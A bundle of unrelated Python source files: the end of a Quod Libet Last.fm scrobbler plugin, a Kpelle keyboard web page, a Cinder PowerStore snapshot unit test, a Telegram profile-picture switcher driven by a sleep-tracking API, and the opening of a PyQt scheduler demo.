return store
def __init__(self):
self.nowplaying_song = None
self.nowplaying_sent = False
self.sessionid = None
self.broken = False
self.username, self.password, self.base_url = ('', '', '')
# These need to be set early for _format_song to work
self.titlepat = parse.Pattern(
self.config_get('titlepat', "") or DEFAULT_TITLEPAT)
self.artpat = parse.Pattern(
self.config_get('artistpat', "") or DEFAULT_ARTISTPAT)
try:
disk_queue_file = open(self.DUMP, 'r')
disk_queue = pickle.load(disk_queue_file)
disk_queue_file.close()
os.unlink(self.DUMP)
self.queue += disk_queue
except Exception:
pass
@classmethod
def dump_queue(klass):
if klass.queue:
try:
disk_queue_file = open(klass.DUMP, 'w')
pickle.dump(klass.queue, disk_queue_file)
disk_queue_file.close()
except IOError:
pass
return 0
def _check_config(self):
user = self.config_get('username')
passw = <PASSWORD>(self.config_get('password')).<PASSWORD>()
url = self.config_get_url()
if not user or not passw or not url:
if self.queue and not self.broken:
self.quick_dialog("Please visit the Plugins window to set "
"QLScrobbler up. Until then, songs will not be "
"submitted.", Gtk.MessageType.INFO)
self.broken = True
elif (self.username, self.password,
self.base_url) != (user, passw, url):
self.username, self.password, self.base_url = (user, passw, url)
self.broken = False
self.handshake_sent = False
self.offline = self.config_get_bool('offline')
self.titlepat = parse.Pattern(
self.config_get('titlepat', "") or DEFAULT_TITLEPAT)
self.artpat = parse.Pattern(
self.config_get('artistpat', "") or DEFAULT_ARTISTPAT)
def changed(self):
"""Signal that settings or queue contents were changed."""
self._check_config()
if not self.broken and not self.offline and (self.queue or
(self.nowplaying_song and not self.nowplaying_sent)):
self.changed_event.set()
return
self.changed_event.clear()
def run(self):
"""Submit songs from the queue. Call from a daemon thread."""
# The spec calls for exponential backoff of failed handshakes, with a
# minimum of 1m and maximum of 120m delay between attempts.
self.handshake_sent = False
self.handshake_event = threading.Event()
self.handshake_event.set()
self.handshake_delay = 1
self.failures = 0
while True:
self.changed_event.wait()
if not self.handshake_sent:
self.handshake_event.wait()
if self.send_handshake():
self.failures = 0
self.handshake_delay = 1
self.handshake_sent = True
else:
self.handshake_event.clear()
self.handshake_delay = min(self.handshake_delay * 2, 120)
GLib.timeout_add(self.handshake_delay * 60 * 1000,
self.handshake_event.set)
continue
self.changed_event.wait()
if self.queue:
if self.send_submission():
self.failures = 0
else:
self.failures += 1
if self.failures >= 3:
self.handshake_sent = False
elif self.nowplaying_song and not self.nowplaying_sent:
self.send_nowplaying()
self.nowplaying_sent = True
else:
# Nothing left to do; wait until something changes
self.changed_event.clear()
def send_handshake(self, show_dialog=False):
# construct url
stamp = int(time.time())
auth = md5(self.password + str(<PASSWORD>()
url = "%s/?hs=true&p=%s&c=%s&v=%s&u=%s&a=%s&t=%d" % (
self.base_url, self.PROTOCOL_VERSION, self.CLIENT,
QLScrobbler.PLUGIN_VERSION, self.username, auth, stamp)
print_d("Sending handshake to service.")
try:
resp = urllib2.urlopen(url)
except (IOError, HTTPException):
if show_dialog:
self.quick_dialog(
"Could not contact service '%s'." %
util.escape(self.base_url), Gtk.MessageType.ERROR)
else:
print_d("Could not contact service. Queueing submissions.")
return False
except ValueError:
self.quick_dialog("Authentication failed: invalid URL.",
Gtk.MessageType.ERROR)
self.broken = True
return False
# check response
lines = resp.read().rstrip().split("\n")
status = lines.pop(0)
print_d("Handshake status: %s" % status)
if status == "OK":
self.session_id, self.nowplaying_url, self.submit_url = lines
self.handshake_sent = True
print_d("Session ID: %s, NP URL: %s, Submit URL: %s" % (
self.session_id, self.nowplaying_url, self.submit_url))
return True
elif status == "BADAUTH":
self.quick_dialog("Authentication failed: Invalid username '%s' "
"or bad password." % util.escape(self.username),
Gtk.MessageType.ERROR)
self.broken = True
elif status == "BANNED":
self.quick_dialog("Client is banned. Contact the author.",
Gtk.MessageType.ERROR)
self.broken = True
elif status == "BADTIME":
self.quick_dialog("Wrong system time. Submissions may fail until "
"it is corrected.", Gtk.MessageType.ERROR)
else: # "FAILED"
self.quick_dialog(status, Gtk.MessageType.ERROR)
self.changed()
return False
def _check_submit(self, url, data):
data_str = urllib.urlencode(data)
try:
resp = urllib2.urlopen(url, data_str)
except (IOError, HTTPException):
print_d("Audioscrobbler server not responding, will try later.")
return False
resp_save = resp.read()
status = resp_save.rstrip().split("\n")[0]
print_d("Submission status: %s" % status)
if status == "OK":
return True
elif status == "BADSESSION":
self.handshake_sent = False
return False
else:
return False
def send_submission(self):
data = {'s': self.session_id}
to_submit = self.queue[:min(len(self.queue), 50)]
for idx, song in enumerate(to_submit):
for key, val in song.items():
data['%s[%d]' % (key, idx)] = val.encode('utf-8')
data['o[%d]' % idx] = 'P'
data['r[%d]' % idx] = ''
print_d('Submitting song(s): %s' %
('\n\t'.join(['%s - %s' % (s['a'], s['t']) for s in to_submit])))
if self._check_submit(self.submit_url, data):
del self.queue[:len(to_submit)]
return True
else:
return False
def send_nowplaying(self):
data = {'s': self.session_id}
for key, val in self.nowplaying_song.items():
data[key] = val.encode('utf-8')
print_d('Now playing song: %s - %s' %
(self.nowplaying_song['a'], self.nowplaying_song['t']))
return self._check_submit(self.nowplaying_url, data)
def quick_dialog_helper(self, dialog_type, msg):
dialog = Message(dialog_type, app.window, "QLScrobbler", msg)
dialog.connect('response', lambda dia, resp: dia.destroy())
dialog.show()
def quick_dialog(self, msg, dialog_type):
GLib.idle_add(self.quick_dialog_helper, dialog_type, msg)
class QLScrobbler(EventPlugin, PluginConfigMixin):
PLUGIN_ID = "QLScrobbler"
PLUGIN_NAME = _("AudioScrobbler Submission")
PLUGIN_DESC = _("Audioscrobbler client for Last.fm, Libre.fm and other "
"Audioscrobbler services.")
PLUGIN_ICON = Gtk.STOCK_CONNECT
PLUGIN_VERSION = "0.12"
# Retain original config section
CONFIG_SECTION = "scrobbler"
def __init__(self):
self.__enabled = False
self.queue = QLSubmitQueue()
queue_thread = threading.Thread(None, self.queue.run)
queue_thread.setDaemon(True)
queue_thread.start()
self.start_time = 0
self.unpaused_time = 0
self.elapsed = 0
self.nowplaying = None
self.exclude = self.config_get('exclude')
# Set up exit hook to dump queue
quodlibet.quit_add(0, self.queue.dump_queue)
def config_get_url(self):
"""Gets the URL for the currently configured service.
This logic was used often enough to be split out from generic config"""
service = self.config_get('service', DEFAULT_SERVICE)
if service in SERVICES:
return SERVICES[service]
else:
return self.config_get('url')
def plugin_on_song_ended(self, song, stopped):
if song is None or not self.__enabled:
return
if self.unpaused_time > 0:
self.elapsed += time.time() - self.unpaused_time
# Spec: * don't submit when song length < 00:30
# * submit at end of playback (not in the middle, as with v1.1)
# * submit if played for >= .5*length or >= 240s
# we check 'elapsed' rather than 'length' to work around wrong ~#length
if self.elapsed < 30:
return
if self.elapsed < 240 and self.elapsed <= .5 * song.get("~#length", 0):
return
print_d("Checking against filter %s" % self.exclude)
if self.exclude and parse.Query(self.exclude).search(song):
print_d("Not submitting: %s" % song("~artist~title"))
return
self.queue.submit(song, self.start_time)
def song_excluded(self, song):
if self.exclude and parse.Query(self.exclude).search(song):
print_d("%s is excluded by %s" %
(song("~artist~title"), self.exclude))
return True
return False
def send_nowplaying(self, song):
if not self.song_excluded(song):
self.queue.set_nowplaying(song)
def plugin_on_song_started(self, song):
if song is None:
return
self.start_time = int(time.time())
if app.player.paused:
self.unpaused_time = 0
else:
self.unpaused_time = time.time()
self.elapsed = 0
if self.__enabled and not app.player.paused:
self.send_nowplaying(song)
else:
self.nowplaying = song
def plugin_on_paused(self):
if self.unpaused_time > 0:
self.elapsed += time.time() - self.unpaused_time
self.unpaused_time = 0
def plugin_on_unpaused(self):
self.unpaused_time = time.time()
if self.__enabled and self.nowplaying:
self.send_nowplaying(self.nowplaying)
self.nowplaying = None
def enabled(self):
self.__enabled = True
print_d("Plugin enabled - accepting new songs.")
def disabled(self):
self.__enabled = False
print_d("Plugin disabled - not accepting any new songs.")
def PluginPreferences(self, parent):
def changed(entry, key):
if entry.get_property('sensitive'):
config.set("plugins", "scrobbler_" + key, entry.get_text())
def combo_changed(widget, urlent):
service = widget.get_active_text()
config.set("plugins", "scrobbler_service", service)
urlent.set_sensitive((service not in SERVICES))
urlent.set_text(self.config_get_url())
def check_login(*args):
queue = QLSubmitQueue()
queue.changed()
status = queue.send_handshake(show_dialog=True)
if status:
queue.quick_dialog("Authentication successful.",
Gtk.MessageType.INFO)
box = Gtk.VBox(spacing=12)
# first frame
table = Gtk.Table(5, 2)
table.set_col_spacings(6)
table.set_row_spacings(6)
labels = []
label_names = [_("_Service:"), _("_URL:"), _("User_name:"),
_("_Password:")]
for idx, label in enumerate(map(Gtk.Label, label_names)):
label.set_alignment(0.0, 0.5)
label.set_use_underline(True)
table.attach(label, 0, 1, idx, idx + 1,
xoptions=Gtk.AttachOptions.FILL |
Gtk.AttachOptions.SHRINK)
labels.append(label)
row = 0
service_combo = Gtk.ComboBoxText()
table.attach(service_combo, 1, 2, row, row + 1)
cur_service = self.config_get('service')
for idx, serv in enumerate(sorted(SERVICES.keys()) + ["Other..."]):
service_combo.append_text(serv)
if cur_service == serv:
service_combo.set_active(idx)
if service_combo.get_active() == -1:
service_combo.set_active(0)
labels[row].set_mnemonic_widget(service_combo)
row += 1
# url
entry = UndoEntry()
entry.set_text(self.config_get('url'))
entry.connect('changed', changed, 'url')
service_combo.connect('changed', combo_changed, entry)
service_combo.emit('changed')
table.attach(entry, 1, 2, row, row + 1)
labels[row].set_mnemonic_widget(entry)
row += 1
# username
entry = UndoEntry()
entry.set_text(self.config_get('username'))
entry.connect('changed', changed, 'username')
table.attach(entry, 1, 2, row, row + 1)
labels[row].set_mnemonic_widget(entry)
row += 1
# password
entry = UndoEntry()
entry.set_text(self.config_get('password'))
entry.set_visibility(False)
entry.connect('changed', changed, 'password')
table.attach(entry, 1, 2, row, row + 1)
labels[row].set_mnemonic_widget(entry)
row += 1
# verify data
button = qltk.Button(_("_Verify account data"), Gtk.STOCK_INFO)
button.connect('clicked', check_login)
table.attach(button, 0, 2, 4, 5)
box.pack_start(qltk.Frame(_("Account"), child=table), True, True, 0)
# second frame
table = Gtk.Table(4, 2)
table.set_col_spacings(6)
table.set_row_spacings(6)
label_names = [_("_Artist pattern:"), _("_Title pattern:"),
_("Exclude _filter:")]
labels = []
for idx, label in enumerate(map(Gtk.Label, label_names)):
label.set_alignment(0.0, 0.5)
label.set_use_underline(True)
table.attach(label, 0, 1, idx, idx + 1,
xoptions=Gtk.AttachOptions.FILL |
Gtk.AttachOptions.SHRINK)
labels.append(label)
row = 0
# artist pattern
entry = UndoEntry()
entry.set_text(self.config_get('artistpat'))
entry.connect('changed', changed, 'artistpat')
table.attach(entry, 1, 2, row, row + 1)
entry.set_tooltip_text(_("The pattern used to format "
"the artist name for submission. Leave blank for default."))
labels[row].set_mnemonic_widget(entry)
row += 1
# title pattern
entry = UndoEntry()
entry.set_text(self.config_get('titlepat'))
entry.connect('changed', changed, 'titlepat')
table.attach(entry, 1, 2, row, row + 1)
entry.set_tooltip_text(_("The pattern used to format "
"the title for submission. Leave blank for default."))
labels[row].set_mnemonic_widget(entry)
row += 1
# exclude filter
entry = ValidatingEntry(parse.Query.is_valid_color)
entry.set_text(self.config_get('exclude'))
entry.set_tooltip_text(
_("Songs matching this filter will not be submitted."))
entry.connect('changed', changed, 'exclude')
table.attach(entry, 1, 2, row, row + 1)
labels[row].set_mnemonic_widget(entry)
row += 1
# offline mode
offline = self.ConfigCheckButton(
_("_Offline mode (don't submit anything)"),
'scrobbler_offline')
offline.set_active(self.config_get('offline') == "true")
table.attach(offline, 0, 2, row, row + 1)
box.pack_start(qltk.Frame(_("Submission"), child=table), True, True, 0)
return box
|
# -*- coding: utf-8 -*-
#!/usr/bin/env python
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
import webapp2
import base
from google.appengine.ext.webapp import template
Language = 'Kpelle'
Language_native = 'Kpelle'
LanguageCode = 'kpe'
ScriptCode = 'Kpel'
encoding_font_list = [
{
'font_path': '/fonts/African_font_encodings/JGKpelleCombined.ttf',
'font_name': 'JG Kpelle combined',
'display_name': 'JG Kpelle combined',
},
]
unicode_font_list = [
{
'family': 'JG Kpelle Combined',
'longName': 'JG Kpelle combined',
'source': '/fonts/African_font_encodings/JGKpelleCombined.ttf',
'note': 'not Unicode',
},
]
kb_list = [
{'shortName': LanguageCode + '_' + ScriptCode,
'longName': Language + ' ' + ScriptCode,
'fontFamily': 'JG Kpelle Combined',
}
]
links = [
{'linkText': 'Keyboard',
'ref': '/' + LanguageCode + '/'
},
{'linkText': 'Keyboard conversions',
'ref': '/' + LanguageCode + '/kbtransforms/'
},
{'linkText': 'Wikipedia Kpelle syllabary',
'ref': 'https://en.wikipedia.org/wiki/Kpelle_syllabary'
},
{'linkText': 'Wikipedia Kpelle language',
'ref': 'https://en.wikipedia.org/wiki/Kpelle_language'},
{'linkText': 'ScriptSource',
'ref': 'https://scriptsource.org/cms/scripts/page.php?item_id=script_detail&key=Kpel'
},
{'linkText': 'Digital Orientalist',
'ref': 'https://digitalorientalist.com/2021/01/22/building-tools-with-bete-mende-and-kpelle-users/'
}
# {'linkText': 'Combiners',
# 'ref': '/kpe/diacritic/'
# },
]
encodedRanges = [
[0xc0, 0x179],
]
class langInfo():
def __init__(self):
self.LanguageCode = LanguageCode
self.Language = Language
self.Language_native = Language_native
self.test_data = u'FILL IN'
# !!!! NOTE that this is not yet Unicode
self.unicode_font_list = unicode_font_list
self.encoding_font_list = encoding_font_list
self.lang_list = [LanguageCode] # This may be extended
self.kb_list = kb_list
self.links = links
self.encoded_ranges = encodedRanges
# For additional resources for download
self.text_file_list = []
# TODO: Fill in the rest of the common data.
# TODO: Fill in with diacritics
diacritic_list = [unichr(x) for x in range(0x1c24, 0x1c37)]
#TODO: Fill in base consonant
default_base_consonant = u'\u1c00'
diacritic_list = [unichr(x) for x in range(0xa926, 0xa92d)]
default_base_consonant = u'\u1c00'
# Presents UI for conversions from font encoding to Unicode.
class ConvertUIHandler(webapp2.RequestHandler):
def get(self):
# All old characters
oldCharList = []
for run in encodedRanges:
oldCharList.extend([unichr(x) + ' ' for x in xrange(run[0], run[1])])
oldChars = ''.join(oldCharList)
text = self.request.get('text', oldChars)
font = self.request.get('font')
testStringList = [
{'name': 'Test 1', # Note: must escape the single quote.
'string': u'\u0004\u0005\u0006\u0007\u0008\u0009' +
'\u000a\u000b'},
]
oldInput = text
unicodeChars = ''
unicodeCombiningChars = ''
template_values = {
'font': font,
'language': Language,
'langTag': LanguageCode,
'encodingList': encoding_font_list,
'encoding': encoding_font_list[0],
'kb_list': kb_list,
'unicodeFonts': unicode_font_list,
'links': links,
'oldChars': oldChars,
'oldInput': oldInput,
'text': text,
'textStrings': testStringList,
'showTools': self.request.get('tools', None),
'unicodeChars': unicodeChars,
'combiningChars': unicodeCombiningChars,
}
path = os.path.join(os.path.dirname(__file__), 'HTML/translit_general.html')
self.response.out.write(template.render(path, template_values))
langInstance = langInfo()
app = webapp2.WSGIApplication([
('/' + LanguageCode + '/', base.LanguagesHomeHandler),
('/' + LanguageCode + '/convertUI/', ConvertUIHandler),
('/' + LanguageCode + '/downloads/', base.Downloads),
('/' + LanguageCode + '/encodingRules/', base.EncodingRules),
('/' + LanguageCode + '/diacritic/', base.DiacriticHandler),
('/' + langInstance.LanguageCode + '/kbtransforms/', base.KeyboardTransforms),
], debug=True,
config={'langInfo': langInstance}
)
|
# Copyright (c) 2021 Dell Inc. or its subsidiaries.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from unittest import mock
from cinder import exception
from cinder.tests.unit import fake_group
from cinder.tests.unit import fake_group_snapshot
from cinder.tests.unit.volume.drivers.dell_emc import powerstore
class TestVolumeGroupSnapshotCreateDelete(powerstore.TestPowerStoreDriver):
@mock.patch("cinder.volume.drivers.dell_emc.powerstore.client."
"PowerStoreClient.get_chap_config")
def setUp(self, mock_chap):
super(TestVolumeGroupSnapshotCreateDelete, self).setUp()
self.driver.check_for_setup_error()
self.group = fake_group.fake_group_obj(
self.context,
)
self.group_snapshot = fake_group_snapshot.fake_group_snapshot_obj(
self.context
)
self.group_snapshot.group = self.group
@mock.patch("cinder.volume.drivers.dell_emc.powerstore.client."
"PowerStoreClient.create_vg_snapshot")
@mock.patch("cinder.volume.drivers.dell_emc.powerstore.client."
"PowerStoreClient.get_vg_id_by_name")
@mock.patch("cinder.volume.volume_utils.is_group_a_cg_snapshot_type")
def test_create_volume_group_snapshot(self,
mock_is_cg,
mock_get_id,
mock_create):
self.driver.create_group_snapshot(self.context,
self.group_snapshot,
[])
@mock.patch("requests.request")
@mock.patch("cinder.volume.drivers.dell_emc.powerstore.client."
"PowerStoreClient.get_vg_id_by_name")
@mock.patch("cinder.volume.volume_utils.is_group_a_cg_snapshot_type")
def test_create_volume_group_snapshot_bad_status(self,
mock_is_cg,
mock_get_id,
mock_create):
mock_create.return_value = powerstore.MockResponse(rc=400)
error = self.assertRaises(exception.VolumeBackendAPIException,
self.driver.create_group_snapshot,
self.context,
self.group_snapshot,
[])
self.assertIn("Failed to create snapshot", error.msg)
@mock.patch("cinder.volume.drivers.dell_emc.powerstore.client."
"PowerStoreClient.delete_volume_or_snapshot")
@mock.patch("cinder.volume.drivers.dell_emc.powerstore.client."
"PowerStoreClient.get_vg_snapshot_id_by_name")
@mock.patch("cinder.volume.drivers.dell_emc.powerstore.client."
"PowerStoreClient.get_vg_id_by_name")
@mock.patch("cinder.volume.volume_utils.is_group_a_cg_snapshot_type")
def test_delete_volume_group_snapshot(self,
mock_is_cg,
mock_get_group_id,
mock_get_snapshot_id,
mock_delete):
self.driver.delete_group_snapshot(self.context,
self.group_snapshot,
[])
@mock.patch("requests.request")
@mock.patch("cinder.volume.drivers.dell_emc.powerstore.client."
"PowerStoreClient.get_vg_snapshot_id_by_name")
@mock.patch("cinder.volume.drivers.dell_emc.powerstore.client."
"PowerStoreClient.get_vg_id_by_name")
@mock.patch("cinder.volume.volume_utils.is_group_a_cg_snapshot_type")
def test_delete_volume_group_snapshot_bad_status(self,
mock_is_cg,
mock_get_group_id,
mock_get_snapshot_id,
mock_delete):
mock_delete.return_value = powerstore.MockResponse(rc=400)
error = self.assertRaises(exception.VolumeBackendAPIException,
self.driver.delete_group_snapshot,
self.context,
self.group_snapshot,
[])
self.assertIn("Failed to delete PowerStore volume group snapshot",
error.msg)
|
<filename>run.py
import asyncio
import base64
import json
import logging
import sys
from enum import Enum, auto
from typing import Dict, Optional, List
import prometheus_client
import requests
from prometheus_client import Gauge, Counter, start_http_server
from telethon.sync import TelegramClient
from telethon.tl.functions.photos import UploadProfilePhotoRequest, UpdateProfilePhotoRequest, \
GetUserPhotosRequest
from telethon.tl.types import InputPhoto, Photo, photos, UserProfilePhoto
logger = logging.getLogger(__name__)
class PFPState(Enum):
AWAKE = auto()
ASLEEP = auto()
startup_time = Gauge("sleeppic_start_unixtime", "Unix timestamp of the last startup time")
latest_switch_time = Gauge("sleeppic_latest_switch_unixtime", "Unix timestamp of the last pfp switch time")
daily_checks = Counter("sleeppic_dailys_check_total", "Total number of times the dailys API has been checked")
count_upload = Counter("sleeppic_upload_total", "Total count of profile pics uploaded", labelnames=["state"])
count_update = Counter("sleeppic_update_total", "Total count of profile pics updated", labelnames=["state"])
state_enum = prometheus_client.Enum(
"sleeppic_current_state",
"Current state of profile picture",
states=[state_val.name.lower() for state_val in PFPState] + ["unknown"]
)
for state_val in PFPState:
count_upload.labels(state=state_val.name.lower())
count_update.labels(state=state_val.name.lower())
class FileData:
def __init__(self, file_id: int, access_hash: int, file_reference: bytes):
self.file_id = file_id
self.access_hash = access_hash
self.file_reference = file_reference
def __eq__(self, other: "FileData") -> bool:
return isinstance(other, FileData) and self.file_id == other.file_id and self.access_hash == other.access_hash
@classmethod
def from_result(cls, result: 'photos.Photo') -> 'FileData':
return FileData.from_photo(result.photo)
@classmethod
def from_photo(cls, photo: 'Photo') -> 'FileData':
return FileData(
photo.id,
photo.access_hash,
photo.file_reference
)
def to_dict(self) -> Dict[str, str]:
return {
"id": self.file_id,
"access_hash": self.access_hash,
"file_reference": base64.b64encode(self.file_reference).decode('ascii')
}
@classmethod
def from_dict(cls, data: Dict) -> 'FileData':
return FileData(
data['id'],
data['access_hash'],
base64.b64decode(data['file_reference'])
)
def to_input_photo(self) -> InputPhoto:
return InputPhoto(
self.file_id,
self.access_hash,
self.file_reference
)
class ProfilePic:
def __init__(self, path: str, file_data: Optional[FileData], state: PFPState):
self.path = path
self.file_data = file_data
self.state = state
def to_dict(self) -> Dict:
result = {
"path": self.path
}
if self.file_data:
result["file"] = self.file_data.to_dict()
return result
@classmethod
def from_dict(cls, data: Dict, state: PFPState) -> 'ProfilePic':
return ProfilePic(
data['path'],
FileData.from_dict(data['file']) if 'file' in data else None,
state
)
# noinspection PyBroadException
class Dailys:
def __init__(self, endpoint_url: str, auth_key: Optional[str] = ""):
self.endpoint_url = endpoint_url
self.auth_key = auth_key or ""
def current_state(self) -> Optional[PFPState]:
try:
logger.debug("Checking dailys")
resp = requests.get(
self.endpoint_url,
headers={
"Authorization": self.auth_key
}
)
daily_checks.inc()
if resp.status_code == 200:
state = PFPState.ASLEEP if resp.json()['is_sleeping'] else PFPState.AWAKE
logger.debug(f"Dailys sleeping state: {state}")
return state
else:
return None
except Exception as e:
logger.warning("Failed to get status from dailys: ", exc_info=e)
return None
class TelegramConfig:
def __init__(self, api_id: int, api_hash: str):
self.api_id = api_id
self.api_hash = api_hash
class DailysConfig:
def __init__(self, endpoint_url: str, auth_key: Optional[str] = None):
self.endpoint_url = endpoint_url
self.auth_key = auth_key or ""
class Config:
def __init__(
self,
telegram_config: TelegramConfig,
dailys_config: DailysConfig,
awake_pic: ProfilePic,
asleep_pic: ProfilePic,
prom_port: int
) -> None:
self.telegram_config = telegram_config
self.dailys_config = dailys_config
self.awake_pic = awake_pic
self.asleep_pic = asleep_pic
self.prom_port = prom_port
@property
def profile_pics(self) -> List[ProfilePic]:
return [self.awake_pic, self.asleep_pic]
def get_pic_with_state(self, state: PFPState) -> Optional[ProfilePic]:
return next(filter(lambda pfp: pfp.state == state, self.profile_pics), None)
@classmethod
def load_from_file(cls) -> "Config":
with open("config.json", "r") as f:
return cls.from_dict(json.load(f))
@classmethod
def from_dict(cls, data: Dict) -> "Config":
return Config(
TelegramConfig(
data["api_id"],
data["api_hash"]
),
DailysConfig(
data["dailys_url"],
data.get("dailys_auth_key")
),
ProfilePic.from_dict(data["awake_pic"], PFPState.AWAKE),
ProfilePic.from_dict(data["asleep_pic"], PFPState.ASLEEP),
data.get("prometheus_port", 8380)
)
def save_to_file(self) -> None:
config = {
"api_id": self.telegram_config.api_id,
"api_hash": self.telegram_config.api_hash,
"dailys_url": self.dailys_config.endpoint_url,
"dailys_auth_key": self.dailys_config.auth_key,
"awake_pic": self.awake_pic.to_dict(),
"asleep_pic": self.asleep_pic.to_dict()
}
with open("config.json", "w") as f:
logger.debug("Saving config to file")
json.dump(config, f, indent=2)
# noinspection PyBroadException
class TelegramWrapper:
def __init__(self, client: TelegramClient):
self.client = client
self.me = None
async def initialise(self) -> None:
self.me = await self.client.get_me()
self.print_me()
def print_me(self) -> None:
logger.debug(self.me.stringify())
logger.debug(self.me.username)
async def update_profile_photo(self, pfp: ProfilePic) -> Optional[FileData]:
logger.info("Updating profile photo")
count_update.labels(state=pfp.state.name.lower()).inc()
pfp_file = await self.get_pfp_with_photo_id(pfp.file_data.file_id)
pfp_input = pfp.file_data.to_input_photo()
if pfp_file is not None:
pfp_input = pfp_file.to_input_photo()
resp = await self.client(UpdateProfilePhotoRequest(id=pfp_input))
if isinstance(resp.photo, UserProfilePhoto):
new_pfp_id = resp.photo.photo_id
elif isinstance(resp.photo, Photo):
new_pfp_id = resp.photo.id
else:
logger.error(f"UpdateProfilePhotoRequest returned unrecognised type: {resp.photo}")
return None
return await self.get_pfp_with_photo_id(new_pfp_id)
async def get_pfp_with_photo_id(self, photo_id: int) -> Optional[FileData]:
all_photos = await self.client(GetUserPhotosRequest(self.me, 0, 0, 0))
matching_photo = next(filter(lambda p: p.id == photo_id, all_photos.photos), None)
if matching_photo is None:
logger.warning(f"Could not find profile photo with ID: {photo_id}")
return None
return FileData.from_photo(matching_photo)
async def current_pic(self) -> Optional[FileData]:
current_photo_id = self.me.photo.photo_id
return await self.get_pfp_with_photo_id(current_photo_id)
async def upload_profile_photo(self, pfp: ProfilePic) -> FileData:
logger.info("Uploading profile photo")
count_upload.labels(state=pfp.state.name.lower()).inc()
input_file = await self.client.upload_file(pfp.path)
result = await self.client(UploadProfilePhotoRequest(file=input_file))
pfp.file_data = FileData.from_result(result)
return FileData.from_result(result)
async def set_pfp(self, pfp: ProfilePic) -> FileData:
if pfp.file_data is None:
return await self.upload_profile_photo(pfp)
try:
file_data = await self.update_profile_photo(pfp)
if file_data:
return file_data
logger.warning("Could not find file data for newly updated profile picture.")
except Exception as e:
logger.warning("Failed to update profile picture: ", exc_info=e)
pass
return await self.upload_profile_photo(pfp)
class PFPManager:
def __init__(self, config: Config, client: TelegramClient) -> None:
self.config = config
self.client = client
self.dailys = Dailys(self.config.dailys_config.endpoint_url, self.config.dailys_config.auth_key)
self.wrapper = None
self.current_state = None
state_enum.state("unknown")
async def initialise(self) -> None:
self.wrapper = TelegramWrapper(self.client)
await self.wrapper.initialise()
self.current_state = await self.profile_pic_state()
if self.current_state:
state_enum.state(self.current_state.name.lower())
startup_time.set_to_current_time()
async def check_and_update(self) -> None:
new_state = self.dailys.current_state()
if new_state is None:
return
if self.current_state is None or self.current_state != new_state:
logger.info(f"State has changed from {self.current_state} to {new_state}")
self.current_state = new_state
state_enum.state(new_state.name.lower())
await self.update_pic_to_state(new_state)
latest_switch_time.set_to_current_time()
async def update_pic_to_state(self, state: PFPState) -> None:
pfp = self.config.get_pic_with_state(state)
if pfp is None:
logger.error(f"No profile pic configured for state: {state}")
return
# Upload pic for current state
file_data = await self.wrapper.set_pfp(pfp)
pfp.file_data = file_data
# Save current state
self.config.save_to_file()
logger.info(f"Updated photo to: {pfp.path}")
async def profile_pic_state(self) -> Optional[PFPState]:
logger.info("Checking current profile picture state")
current_file = await self.wrapper.current_pic()
if current_file is None:
logger.warning("No profile picture is currently set")
return None
current_id = current_file.file_id
matching_pfps = [
pfp
for pfp in self.config.profile_pics
if pfp.file_data and pfp.file_data.file_id == current_id
]
if not matching_pfps:
logger.warning("Current profile picture did not seem to match any known state")
return None
current_state = matching_pfps[0].state
logger.info(f"Current profile picture is {current_state}")
return current_state
def setup_logging() -> None:
formatter = logging.Formatter("{asctime}:{levelname}:{name}:{message}", style="{")
base_logger = logging.getLogger()
base_logger.setLevel(logging.INFO)
console_handler = logging.StreamHandler(sys.stdout)
console_handler.setFormatter(formatter)
base_logger.addHandler(console_handler)
async def run() -> None:
conf = Config.load_from_file()
async with TelegramClient('anon', conf.telegram_config.api_id, conf.telegram_config.api_hash) as c:
manager = PFPManager(conf, c)
await manager.initialise()
start_http_server(conf.prom_port)
while True:
try:
logger.info("Checking..")
await manager.check_and_update()
await asyncio.sleep(60)
except KeyboardInterrupt:
break
if __name__ == "__main__":
setup_logging()
event_loop = asyncio.get_event_loop()
event_loop.run_until_complete(run())
logger.info("Shutting down")
|
# MIT License
#
# Copyright (c) 2019 <NAME>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
"""
Demonstrates the usage of Scheduler in a simple PyQt program which shows progress and output.
Dependencies are in `requirements.txt`. To install them, run `pip install -r requirements.txt --user`
in this directory.
"""
import asyncio
import random
import sys
import time
from typing import List, Tuple
import qasync
from PyQt5 import QtGui
from PyQt5.QtWidgets import (
QApplication,
QLabel,
QProgressBar,
QVBoxLayout,
QWidget,
QPushButton,
)
from scheduler.Scheduler import Scheduler
def long_calculation(sleep_time: int) -> int:
"""
Will be executed in another process. Simulates a long calculation, and returns the 'result'.
"""
time.sleep(sleep_time)
return sleep_time
class Window(QWidget):
"""Basic window class."""
def __init__(self):
super().__init__()
layout = QVBoxLayout()
self.setLayout(layout)
self.label = QLabel("Output from processes will be shown here", self)
layout.addWidget(self.label)
self.progress = QProgressBar(self)
layout.addWidget(self.progress)
self.button = QPushButton("Start", self)
